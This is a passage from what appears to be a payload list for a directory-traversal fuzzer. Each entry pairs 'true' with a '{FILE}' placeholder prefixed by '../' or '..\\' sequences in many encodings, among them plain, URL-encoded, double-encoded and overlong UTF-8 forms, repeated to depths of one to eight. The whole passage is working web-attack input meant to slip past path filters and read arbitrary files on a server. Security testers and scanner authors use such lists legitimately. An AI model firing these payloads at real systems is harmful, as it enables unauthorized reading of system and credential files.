"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,..%c0%af{FILE}", + "true,..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,..%%32%66{FILE}", + "true,..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,..%%35%63{FILE}", + "true,..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,..\\{FILE}", + "true,..\\..\\{FILE}", + "true,..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%5c{FILE}", + "true,..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,..%255c{FILE}", + "true,..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + 